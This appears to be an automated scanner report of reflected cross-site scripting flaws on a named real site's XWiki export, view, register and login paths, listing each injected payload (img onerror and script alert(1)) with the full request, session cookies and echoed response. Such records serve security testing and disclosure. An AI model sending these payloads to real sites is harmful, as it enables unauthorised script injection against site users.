GET /xwiki/bin/export/Mainf83de"><img%20src%3da%20onerror%3dalert(1)>5f41d66ee78/WebHome HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 14:18:25 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12858 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/Mainf83de%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E5f41d66ee78/WebHome?format=xar&name=Mainf83de"><img src=a onerror=alert(1)>5f41d66ee78.WebHome&pages=Mainf83de"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a777f<img%20src%3da%20onerror%3dalert(1)>bb226e90ef6 was submitted in the REST URL parameter 4. This input was echoed as a777f<img src=a onerror=alert(1)>bb226e90ef6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/export/Maina777f<img%20src%3da%20onerror%3dalert(1)>bb226e90ef6/WebHome HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 14:18:54 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12792 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/view/Maina777f%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ebb226e90ef6/">Maina777f<img src=a onerror=alert(1)>bb226e90ef6</a> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8f16"><img%20src%3da%20onerror%3dalert(1)>124352d5031 was submitted in the REST URL parameter 5. This input was echoed as c8f16"><img src=a onerror=alert(1)>124352d5031 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/export/Main/WebHomec8f16"><img%20src%3da%20onerror%3dalert(1)>124352d5031 HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 14:19:18 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12863 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/Main/WebHomec8f16%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E124352d5031?format=xar&name=Main.WebHomec8f16"><img src=a onerror=alert(1)>124352d5031&pages=Main.WebHomec8f16"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f6f73<img%20src%3da%20onerror%3dalert(1)>f496e7fa5ac was submitted in the REST URL parameter 5. This input was echoed as f6f73<img src=a onerror=alert(1)>f496e7fa5ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/export/Main/WebHomef6f73<img%20src%3da%20onerror%3dalert(1)>f496e7fa5ac HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 14:19:52 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12801 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href='http://www.nuxeo.org/xwiki/bin/view/Main/WebHomef6f73%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ef496e7fa5ac'>WebHomef6f73<img src=a onerror=alert(1)>f496e7fa5ac</a> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e3ebd<img%20src%3da%20onerror%3dalert(1)>55b90c707ba was submitted in the REST URL parameter 4. This input was echoed as e3ebd<img src=a onerror=alert(1)>55b90c707ba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/export/skinse3ebd<img%20src%3da%20onerror%3dalert(1)>55b90c707ba/toucan HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 14:18:59 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12813 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/view/skinse3ebd%3Cimg+src%3Da+onerror%3Dalert%281%29%3E55b90c707ba/">skinse3ebd<img src=a onerror=alert(1)>55b90c707ba</a> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fef32"><img%20src%3da%20onerror%3dalert(1)>d71e73a5f1d was submitted in the REST URL parameter 4. This input was echoed as fef32"><img src=a onerror=alert(1)>d71e73a5f1d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/export/skinsfef32"><img%20src%3da%20onerror%3dalert(1)>d71e73a5f1d/toucan HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 14:18:32 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12879 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/skinsfef32%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ed71e73a5f1d/toucan?format=xar&name=skinsfef32"><img src=a onerror=alert(1)>d71e73a5f1d.toucan&pages=skinsfef32"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68a4f"><img%20src%3da%20onerror%3dalert(1)>9a7616758c8 was submitted in the REST URL parameter 5. This input was echoed as 68a4f"><img src=a onerror=alert(1)>9a7616758c8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/export/skins/toucan68a4f"><img%20src%3da%20onerror%3dalert(1)>9a7616758c8 HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 14:19:40 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12863 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/skins/toucan68a4f%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E9a7616758c8?format=xar&name=skins.toucan68a4f"><img src=a onerror=alert(1)>9a7616758c8&pages=skins.toucan68a4f"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 41c04<img%20src%3da%20onerror%3dalert(1)>a6287896c27 was submitted in the REST URL parameter 5. This input was echoed as 41c04<img src=a onerror=alert(1)>a6287896c27 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/export/skins/toucan41c04<img%20src%3da%20onerror%3dalert(1)>a6287896c27 HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 14:19:58 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12801 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href='http://www.nuxeo.org/xwiki/bin/view/skins/toucan41c04%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ea6287896c27'>toucan41c04<img src=a onerror=alert(1)>a6287896c27</a> ...[SNIP]...
The value of the xredirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e135"><script>alert(1)</script>f943fd1f5a1 was submitted in the xredirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xwiki/bin/login/XWiki/XWikiLogin?xredirect=http%3A%2F%2Fwww.nuxeo.org%2Fxwiki%2Fbin%2Fview%2FMain%2F3e135"><script>alert(1)</script>f943fd1f5a1 HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 401 Unauthorized Date: Mon, 15 Nov 2010 14:17:10 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 13229 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <input type="hidden" name="xredirect" value="http://www.nuxeo.org/xwiki/bin/view/Main/3e135"><script>alert(1)</script>f943fd1f5a1" /> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 458d1<img%20src%3da%20onerror%3dalert(1)>8dd7e8dd01c was submitted in the REST URL parameter 4. This input was echoed as 458d1<img src=a onerror=alert(1)>8dd7e8dd01c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/register/XWiki458d1<img%20src%3da%20onerror%3dalert(1)>8dd7e8dd01c/Register HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 14:19:33 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 13999 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/view/XWiki458d1%3Cimg+src%3Da+onerror%3Dalert%281%29%3E8dd7e8dd01c/">XWiki458d1<img src=a onerror=alert(1)>8dd7e8dd01c</a> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63e7a"><img%20src%3da%20onerror%3dalert(1)>c726e3e58ec was submitted in the REST URL parameter 4. This input was echoed as 63e7a"><img src=a onerror=alert(1)>c726e3e58ec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/register/XWiki63e7a"><img%20src%3da%20onerror%3dalert(1)>c726e3e58ec/Register HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 14:18:47 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 14065 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/XWiki63e7a%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ec726e3e58ec/Register?format=xar&name=XWiki63e7a"><img src=a onerror=alert(1)>c726e3e58ec.Register&pages=XWiki63e7a"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7501a"><img%20src%3da%20onerror%3dalert(1)>a1cd787231b was submitted in the REST URL parameter 5. This input was echoed as 7501a"><img src=a onerror=alert(1)>a1cd787231b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/register/XWiki/Register7501a"><img%20src%3da%20onerror%3dalert(1)>a1cd787231b HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 14:19:53 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 14049 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/XWiki/Register7501a%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ea1cd787231b?format=xar&name=XWiki.Register7501a"><img src=a onerror=alert(1)>a1cd787231b&pages=XWiki.Register7501a"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ba825<img%20src%3da%20onerror%3dalert(1)>650a8396e8d was submitted in the REST URL parameter 5. This input was echoed as ba825<img src=a onerror=alert(1)>650a8396e8d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/register/XWiki/Registerba825<img%20src%3da%20onerror%3dalert(1)>650a8396e8d HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 14:20:39 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 13987 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href='http://www.nuxeo.org/xwiki/bin/view/XWiki/Registerba825%3Cimg+src%3Da+onerror%3Dalert%281%29%3E650a8396e8d'>Registerba825<img src=a onerror=alert(1)>650a8396e8d</a> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8dc28<img%20src%3da%20onerror%3dalert(1)>e5ffb44f0ee was submitted in the REST URL parameter 4. This input was echoed as 8dc28<img src=a onerror=alert(1)>e5ffb44f0ee in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/FAQ8dc28<img%20src%3da%20onerror%3dalert(1)>e5ffb44f0ee/DownloadingNuxeoSources HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:17:45 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 13066 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/view/FAQ8dc28%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ee5ffb44f0ee/">FAQ8dc28<img src=a onerror=alert(1)>e5ffb44f0ee</a> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58367"><img%20src%3da%20onerror%3dalert(1)>5591b8e1ed1 was submitted in the REST URL parameter 4. This input was echoed as 58367"><img src=a onerror=alert(1)>5591b8e1ed1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/FAQ58367"><img%20src%3da%20onerror%3dalert(1)>5591b8e1ed1/DownloadingNuxeoSources HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:17:00 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 13132 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
